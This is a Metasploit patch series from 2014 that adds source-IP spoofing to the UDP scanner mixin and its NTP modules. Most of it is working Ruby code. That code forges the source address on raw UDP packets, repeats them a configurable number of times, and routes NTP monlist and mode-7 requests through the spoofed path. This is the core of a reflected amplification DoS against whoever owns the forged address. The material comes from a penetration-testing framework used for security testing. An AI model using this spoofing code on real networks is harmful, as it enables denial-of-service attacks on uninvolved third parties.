From c216cf8c53f0e7d0ea33550a177814e7fa88aa03 Mon Sep 17 00:00:00 2001 From: Josh Abraham Date: Fri, 19 Sep 2014 10:29:05 -0400 Subject: [PATCH 1/5] added spoofing capabilities to udp_scanner --- lib/msf/core/auxiliary/drdos.rb | 13 +++++++++++++ lib/msf/core/auxiliary/udp_scanner.rb | 18 ++++++++++++++++++ 2 files changed, 31 insertions(+) diff --git a/lib/msf/core/auxiliary/drdos.rb b/lib/msf/core/auxiliary/drdos.rb index fdf3f3f93e..b6b08fc5ed 100644 --- a/lib/msf/core/auxiliary/drdos.rb +++ b/lib/msf/core/auxiliary/drdos.rb @@ -8,6 +8,15 @@ module Msf ### module Auxiliary::DRDoS + def initialize(info = {}) + super + register_advanced_options( + [ + OptAddress.new('SRCIP', [false, 'Use this source IP']), + OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]), + ], self.class) + end + def prove_amplification(response_map) vulnerable = false proofs = [] @@ -43,5 +52,9 @@ module Auxiliary::DRDoS [ vulnerable, proofs.join(', ') ] end + def spoofed? + !datastore['SRCIP'].nil? + end + end end diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index 2891c0da72..b33a573447 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -69,6 +69,24 @@ module Auxiliary::UDPScanner scanner_postscan(batch) end + # Send a spoofed packet to a given host and port + def scanner_spoof_send(data, ip, port, srcip, num_packets=1) + open_pcap + p = PacketFu::UDPPacket.new + p.ip_saddr = srcip + p.ip_daddr = ip + p.ip_ttl = 255 + p.udp_src = (rand((2**16)-1024)+1024).to_i + p.udp_dst = port + p.payload = @probe + p.recalc + 1.upto(num_packets) do |x| + print_status("Sending packet to #{ip} from #{srcip}") + capture_sendto(p, ip) + end + close_pcap + end + # Send a packet to a given host and port def scanner_send(data, ip, port) From 43171141da59f7b2a23f33b85fde2a7bf0a92f3d Mon Sep 17 00:00:00 2001 From: Josh Abraham Date: Fri, 19 Sep 2014 11:14:11 -0400 Subject: [PATCH 2/5] update for ntp modules --- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 8 +++++++- modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 8 +++++++- 6 files changed, 42 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index e05385a76f..b32642f26f 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -48,7 +49,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index 2984c57d9a..604b82c4b4 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called before the scan block diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index b58429f90c..00ab6a6531 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index 1022b735db..7fd5258e2a 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -37,7 +38,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index 68d9b66263..1bcd568b8d 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -38,7 +39,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 44b3bbc56d..50bb2f61f6 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report + include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -36,7 +37,12 @@ class Metasploit3 < Msf::Auxiliary # Called for each IP in the batch def scan_host(ip) - scanner_send(@probe, ip, datastore['RPORT']) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end end # Called for each response packet From 3fb00ece9ebeb1bd771d52454a140d210984c6a7 Mon Sep 17 00:00:00 2001 From: Josh Abraham Date: Sat, 20 Sep 2014 14:10:00 -0400 Subject: [PATCH 3/5] refactored the code based on PR feedback --- lib/msf/core/auxiliary/ntp.rb | 13 ++++++++++++- lib/msf/core/auxiliary/udp_scanner.rb | 2 +- modules/auxiliary/scanner/ntp/ntp_monlist.rb | 13 +------------ modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb | 11 ----------- .../auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb | 11 ----------- modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb | 11 ----------- modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb | 11 ----------- modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb | 11 ----------- 8 files changed, 14 insertions(+), 69 deletions(-) diff --git a/lib/msf/core/auxiliary/ntp.rb b/lib/msf/core/auxiliary/ntp.rb index abaa96b157..8551555b4d 100644 --- a/lib/msf/core/auxiliary/ntp.rb +++ b/lib/msf/core/auxiliary/ntp.rb @@ -1,6 +1,6 @@ # -*- coding: binary -*- require 'rex/proto/ntp' - +require 'msf/core/exploit' module Msf ### @@ -10,6 +10,7 @@ module Msf ### module Auxiliary::NTP + include Exploit::Capture include Auxiliary::Scanner # @@ -29,5 +30,15 @@ module Auxiliary::NTP OptInt.new('IMPLEMENTATION', [true, 'Use this NTP mode 7 implementation', 3]) ], self.class) end + + # Called for each IP in the batch + def scan_host(ip) + if spoofed? + datastore['ScannerRecvWindow'] = 0 + scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) + else + scanner_send(@probe, ip, datastore['RPORT']) + end + end end end diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index b33a573447..eae30f0ff6 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -80,8 +80,8 @@ module Auxiliary::UDPScanner p.udp_dst = port p.payload = @probe p.recalc + print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}") 1.upto(num_packets) do |x| - print_status("Sending packet to #{ip} from #{srcip}") capture_sendto(p, ip) end close_pcap diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index b32642f26f..1dfefca414 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -47,17 +46,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - - # Called for each response packet +# Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= { messages: [], peers: [] } @results[shost][:messages] << Rex::Proto::NTP::NTPPrivate.new(data) diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb index 604b82c4b4..1458ad42f9 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -35,16 +34,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called before the scan block def scanner_prescan(batch) @results = {} diff --git a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb index 00ab6a6531..95ff582122 100644 --- a/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -35,16 +34,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] diff --git a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb index 7fd5258e2a..7b2968e977 100644 --- a/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -36,16 +35,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] diff --git a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb index 1bcd568b8d..0b1455c195 100644 --- a/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -37,16 +36,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] diff --git a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb index 50bb2f61f6..4620d0b778 100644 --- a/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb +++ b/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb @@ -8,7 +8,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report - include Msf::Exploit::Capture include Msf::Exploit::Remote::Udp include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::NTP @@ -35,16 +34,6 @@ class Metasploit3 < Msf::Auxiliary ) end - # Called for each IP in the batch - def scan_host(ip) - if spoofed? - datastore['ScannerRecvWindow'] = 0 - scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS']) - else - scanner_send(@probe, ip, datastore['RPORT']) - end - end - # Called for each response packet def scanner_process(data, shost, sport) @results[shost] ||= [] From cd8b1318e069b905d5bee44ece8cabf848366724 Mon Sep 17 00:00:00 2001 From: Josh Abraham Date: Sat, 20 Sep 2014 15:18:58 -0400 Subject: [PATCH 4/5] send data based on input not @probe --- lib/msf/core/auxiliary/udp_scanner.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/udp_scanner.rb b/lib/msf/core/auxiliary/udp_scanner.rb index eae30f0ff6..a7d654a362 100644 --- a/lib/msf/core/auxiliary/udp_scanner.rb +++ b/lib/msf/core/auxiliary/udp_scanner.rb @@ -78,7 +78,7 @@ module Auxiliary::UDPScanner p.ip_ttl = 255 p.udp_src = (rand((2**16)-1024)+1024).to_i p.udp_dst = port - p.payload = @probe + p.payload = data p.recalc print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}") 1.upto(num_packets) do |x| From e86b18cdd48970a9aac9dbb4182d56ee20387cff Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Mon, 22 Sep 2014 11:48:39 -0700 Subject: [PATCH 5/5] Add sanity check for NUM_REQUESTS --- lib/msf/core/auxiliary/drdos.rb | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/lib/msf/core/auxiliary/drdos.rb b/lib/msf/core/auxiliary/drdos.rb index b6b08fc5ed..ddf1ca8fdf 100644 --- a/lib/msf/core/auxiliary/drdos.rb +++ b/lib/msf/core/auxiliary/drdos.rb @@ -17,6 +17,13 @@ module Auxiliary::DRDoS ], self.class) end + def setup + super + if spoofed? && datastore['NUM_REQUESTS'] < 1 + raise Msf::OptionValidateError.new(['NUM_REQUESTS']), 'The number of requests must be >= 1' + end + end + def prove_amplification(response_map) vulnerable = false proofs = []